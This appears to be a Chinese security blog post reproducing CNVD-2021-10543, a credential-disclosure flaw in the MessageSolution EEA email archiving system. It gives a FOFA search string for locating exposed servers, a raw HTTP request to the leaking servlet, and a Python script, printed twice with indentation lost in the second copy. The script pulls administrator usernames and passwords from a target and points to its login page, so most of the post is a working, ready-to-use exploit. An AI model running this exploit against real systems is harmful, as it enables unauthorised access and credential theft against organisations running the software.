MessageSolution 邮件归档系统EEA 漏洞复现

发表评论
648 views

A+

摘要

MessageSolution企业邮件归档管理系统 EEA是北京易讯思达科技开发有限公司开发的一款邮件归档系统。该系统存在通用WEB信息泄漏，泄露Windows服务器administrator hash与web账号密码

漏洞描述：

漏洞编号：

CNVD-2021-10543

1	CNVD-2021-10543

漏洞复现：

fofa：

title="MessageSolution Enterprise Email Archiving (EEA)"

1	title="MessageSolution Enterprise Email Archiving (EEA)"

Poc1：

GET /authenticationserverservlet  HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=A134E6653C13B6821C47E1A2698389E5
Connection: close
Upgrade-Insecure-Requests: 1

GET /authenticationserverservlet HTTP/1.1

Host: ip

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:56.0) Gecko/20100101 Firefox/56.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Cookie: JSESSIONID=A134E6653C13B6821C47E1A2698389E5

Connection: close

Upgrade-Insecure-Requests: 1

Poc2:

# CNVD-2021-10543
# MessageSolution 企业邮件归档管理系统 EEA 存在信息泄露漏洞
# fofa: title="MessageSolution"

import requests
import time
import json
from bs4 import BeautifulSoup
# 忽略SSL证书校验提醒
requests.packages.urllib3.disable_warnings()

def title():
    print("+-------------------------------------------------+")
    print("+-----------    CNVD-2021-10543   ----------------+")
    print("+----------- MessageSolution信息泄漏 --------------+")
    print('+--------- Fofa: title="MessageSolution" ---------+')
    print("+--------  use: python3 CNVD-2021-10543.py -------+")
    print("+-------------------------------------------------+")

def target_url(url):
    target_url = url + "/authenticationserverservlet/"
    login_url = url + "/indexcommon.jsp"
    # verify = False 忽略SSL证书校验
    try:
        res = requests.get(url=target_url, verify=False,timeout=5)
        if "administrator" in res.text and res.status_code == 200:
            print(f"[!] \033[31m目标系统: {url} 存在信息泄漏\033[0m")
            time.sleep(1)
            print("[!] \033[31m正在获取目标系统敏感信息.........\033[0m")
            bs_xml = BeautifulSoup(res.text,features="html.parser")
            user_names = bs_xml.findAll('username')
            passwords = bs_xml.findAll('password')
            i = 1
            print(f"[!] \033[31m获取到目标系统信息:\033[0m")
            if i < len(user_names):
                for user_name,password  in user_names,passwords:
                    print(f"   用户名: {user_name.text}    密 码: {password.text}")
                    i = i+1
            else:
                print(f"   用户名: {user_names[0].text}\n   密 码: {passwords[0].text}")
            print(f"\033[32m[0] 请访问: {login_url} 进行登录！")
        else:
            print(f"[0]  \033[32m目标系统: {url} 不存在信息泄\033[0m")
    except Exception as e:
        print(f"[!]  目标系统: {url} 出现意外错误：\n {e}")
if __name__ == "__main__":
    title()
    url = str(input("[0] 请输入目标站点URL:\n"))
    target_url(url)

# CNVD-2021-10543

# MessageSolution 企业邮件归档管理系统 EEA 存在信息泄露漏洞

# fofa: title="MessageSolution"

import requests

import time

import json

from bs4 import BeautifulSoup

# 忽略SSL证书校验提醒

requests.packages.urllib3.disable_warnings()

def title():

print("+-------------------------------------------------+")

print("+----------- CNVD-2021-10543 ----------------+")

print("+----------- MessageSolution信息泄漏 --------------+")

print('+--------- Fofa: title="MessageSolution" ---------+')

print("+-------- use: python3 CNVD-2021-10543.py -------+")

print("+-------------------------------------------------+")

def target_url(url):

target_url = url + "/authenticationserverservlet/"

login_url = url + "/indexcommon.jsp"

# verify = False 忽略SSL证书校验

try:

res = requests.get(url=target_url, verify=False,timeout=5)

if "administrator" in res.text and res.status_code == 200:

print(f"[!] \033[31m目标系统: {url} 存在信息泄漏\033[0m")

time.sleep(1)

print("[!] \033[31m正在获取目标系统敏感信息.........\033[0m")

bs_xml = BeautifulSoup(res.text,features="html.parser")

user_names = bs_xml.findAll('username')

passwords = bs_xml.findAll('password')

i = 1

print(f"[!] \033[31m获取到目标系统信息:\033[0m")

if i < len(user_names):

for user_name,password in user_names,passwords:

print(f" 用户名: {user_name.text} 密码: {password.text}")

i = i+1

else:

print(f" 用户名: {user_names[0].text}\n 密码: {passwords[0].text}")

print(f"\033[32m[0] 请访问: {login_url} 进行登录！")

else:

print(f"[0] \033[32m目标系统: {url} 不存在信息泄\033[0m")

except Exception as e:

print(f"[!] 目标系统: {url} 出现意外错误：\n {e}")

if __name__ == "__main__":

title()

url = str(input("[0] 请输入目标站点URL:\n"))

target_url(url)

工具附件：

https://github.com/Henry4E36/CNVD-2021-10543

1	https://github.com/Henry4E36/CNVD-2021-10543

我的微信
这是我的微信扫一扫

我的微信公众号
我的微信公众号扫一扫

一	二	三	四	五	六	日
1	2	3	4	5	6	7
8	9	10	11	12	13	14
15	16	17	18	19	20	21
22	23	24	25	26	27	28
29	30	31